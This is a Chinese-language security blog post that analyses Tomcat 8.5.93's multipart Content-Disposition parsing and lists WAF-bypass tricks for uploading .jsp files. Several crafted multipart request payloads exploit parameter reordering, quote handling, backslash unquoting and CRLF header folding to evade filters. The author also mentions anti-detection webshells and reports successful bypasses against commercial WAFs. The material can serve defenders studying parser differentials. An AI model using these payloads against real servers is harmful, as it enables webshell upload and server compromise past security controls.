【Tomcat文件上传】绕WAF姿势深入研究

环境

本地环境tomcat8.5.93，无黑白名单限制

getSubmittedFileName()函数

tomcat可以通过filePart.getSubmittedFileName();获取上传文件的原始名filename

获取Content-Disposition头后，判断值是否form-data或attachment开头

然后112行将form-data; name="file"; filename="Test1.jsp"使用paramParser.parse()函数，将等于号=和分号;作为分割符进行分割

遇到等于号就进行赋值，等于号前面值为key，等于号后面到分号的值前面为value

然后会判断filename中是否存在\字符，并使用trim()除去空字符

最后获得一个Map

绕waf可利用点

1、getSubmittedFileName()函数在判断form-data位置，因为只是判断开头，后面可以随意构造form-dataaaaaaaaa

------WebKitFormBoundaryXWuXiFKBGGezJVGj
Content-Disposition: form-dataaaaaaaaa; name="file"; filename="Test1.jsp"
Content-Type: image/png123123231
------WebKitFormBoundaryXWuXiFKBGGezJVGj--

2、因为getSubmittedFileName()生成的map，所以Content-Disposition里参数可以随意变换位置或添加参数

------WebKitFormBoundaryXWuXiFKBGGezJVGj
Content-Disposition: form-dataaaaaaaaa; name="file"; asd="asd"; filename="Test1.jsp"
Content-Type: image/png123123231
------WebKitFormBoundaryXWuXiFKBGGezJVGj--

------WebKitFormBoundaryXWuXiFKBGGezJVGj
Content-Disposition: form-dataaaaaaaaa; filename="Test1.jsp"; name="file"; asd="asd";
Content-Type: image/png123123231
------WebKitFormBoundaryXWuXiFKBGGezJVGj--

3、Content-Disposition通过等于号和分号作为分割符，但是双引号里面的分号不会被解析

当遇到等于号时，使用parseQuotedToken()函数进行截断到下一个分号，然后赋值

跟进parseQuotedToken()函数里面可以看到

遇到双引号会导致后面的分号不会当作分割符，只有双数双引号结束后，后面分号才起作用

下面是双引号中分号失效

------WebKitFormBoundaryXWuXiFKBGGezJVGj
Content-Disposition: form-data; name="file"; filename="12;3.jsp"
Content-Type: image/png123123231
------WebKitFormBoundaryXWuXiFKBGGezJVGj--

下面是单个双引号后面的分号也会失效

------WebKitFormBoundaryXWuXiFKBGGezJVGj
Content-Disposition: form-data; name="file"; filename="12;3.jsp
Content-Type: image/png123123231
------WebKitFormBoundaryXWuXiFKBGGezJVGj--

但双引号被转译就不行了

------WebKitFormBoundaryXWuXiFKBGGezJVGj
Content-Disposition: form-data; name="file"; filename=\"12;3.jsp
Content-Type: image/png123123231
------WebKitFormBoundaryXWuXiFKBGGezJVGj--

4、按照分号分割符，filename内容会被解析到分号或换行

5、ch1ng和y4tacker师傅在之前提过一个好玩的地方

https://www.ch1ng.com/blog/264.htmlhttps://y4tacker.github.io/2022/06/19/year/2022/6/%E6%8E%A2%E5%AF%BBTomcat%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%B5%81%E9%87%8F%E5%B1%82%E9%9D%A2%E7%BB%95waf%E6%96%B0%E5%A7%BF%E5%8A%BF/

如果filename里面存在\字符，则会调用HttpParser.unquote()函数

上面师傅说的很清楚了，双引号开头会将转译符\屏蔽，并且长度往前走一位，filename=""Te\st1.png"会被解析成Test1.pn

-----------------------------6920084414045732195561853497
Content-Disposition: form-data; name="file"; filename=""Te\st.j\spa"
Content-Type: image/png123
-----------------------------6920084414045732195561853497--

-----------------------------6920084414045732195561853497
Content-Disposition: form-data; name="file"; filename="Te\st.j\spa
Content-Type: image/png123
-----------------------------6920084414045732195561853497--

Content-Disposition头解析

这姿势是在参加阿里云waf挑战赛和绕长亭雷池waf时发现的，最近有空跟进一下tomcat源码，具体的绕过poc就不公布了(放星球了)

正常文件上传时，tomcat会将multipart的内容进行解析，将下面部分解析成两个header头：
Content-Disposition和Content-Type

Content-Disposition: form-data; name="file"; filename="Test1.jsp";
Content-Type: image/png

正常上传

------WebKitFormBoundaryXWuXiFKBGGezJVGj
Content-Disposition: form-data; name="file"; filename="Test1.jsp"
aaa
Content-Type: image/png123123231
------WebKitFormBoundaryXWuXiFKBGGezJVGj--

可见cdl的值为

form-data; name="file"; filename="Test1.jsp"

如果Content-Disposition后面出现回车\r\n+空格

那么第二行的空格及后边内容将会被解析为Content-Disposition的值

//回车加空格
------WebKitFormBoundaryXWuXiFKBGGezJVGj
Content-Disposition: form-data; name="file"; filename="Test1.jsp"abcd
Content-Type: image/png123123231
------WebKitFormBoundaryXWuXiFKBGGezJVGj--

可见cdl的值为 form-data; name="file"; filename="Test1.jsp" abcd

此原因出现在tomcat对Content-Disposition的解析上

tomcat-coyote-8.5.93.jar!/org/apache/tomcat/util/http/fileupload/MultipartStream.class

源码中tomcat首先获取multipart中所有header信息，当遇到两次回车换行\r\n\r\n时截止

此时headers信息是:

Content-Disposition: form-data; name="file"; filename="Test1.jsp"\r\nContent-Type: image/png\r\n\r\n

然后将headers进行分割，遇到第一个回车换行\r\n后，进行字符串截断

此时header信息为

Content-Disposition: form-data; name="file"; filename="Test1.jsp"

紧接着会对下一个字符进行判断，如果不是空格 或 tab\t，则退出循环

tomcat-coyote-8.5.93.jar!/org/apache/tomcat/util/http/fileupload/FileUploadBase.class

此时生成俩header头

Content-Disposition: form-data; name="file"; filename="Test1.jsp"
Content-Type: image/png

但如果是空格 或tab\t，则将Content-Disposition值后面拼接空格再拼接到下一个换行回车之前的内容.

此时生成一个header头

Content-Disposition: form-data; name="file"; filename="Test1.jsp" Content-Type: image/png

这里还有一点，在parseEndOfLine函数进行分割头时，如果遇到单个\r或单个\n则也不会分割

只有遇到\r\n连起来时才分割

------WebKitFormBoundaryXWuXiFKBGGezJVGj
Content-Disposition: form-data; name="file"; filename="123.png"\r
Content-Type: image/png.jsp123123231
------WebKitFormBoundaryXWuXiFKBGGezJVGj--

------WebKitFormBoundaryXWuXiFKBGGezJVGj
Content-Disposition: form-data; name="file"; filename="123.png"\n
Content-Type: image/png.jsp123123231
------WebKitFormBoundaryXWuXiFKBGGezJVGj--

绕waf可利用点

1、回车后空格构造.jsp结尾

最好是用在上传后文件重命名的地方

-----------------------------6920084414045732195561853497
Content-Disposition: form-data; name="file"; filename="test.png"Content-Type: image/pnga.jsp123123231
-----------------------------6920084414045732195561853497--

2、单换行或单回车构造

-----------------------------6920084414045732195561853497
Content-Disposition: form-data; name="file"; filename="test.png"\n
Content-Type: image/png.jsp123123231
-----------------------------6920084414045732195561853497--

至于绕上传文件的内容，使用XG拟态生成免杀马，测试可过部分waf，其他需要去自己测试了

下面是雷池的SQL靶场，上传无拦截

参考🔗

https://www.ch1ng.com/blog/264.htmlhttps://y4tacker.github.io/2022/06/19/year/2022/6/%E6%8E%A2%E5%AF%BBTomcat%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%B5%81%E9%87%8F%E5%B1%82%E9%9D%A2%E7%BB%95waf%E6%96%B0%E5%A7%BF%E5%8A%BF/https://www.cnblogs.com/zpchcbd/p/17048404.html

​

原创 XG小刚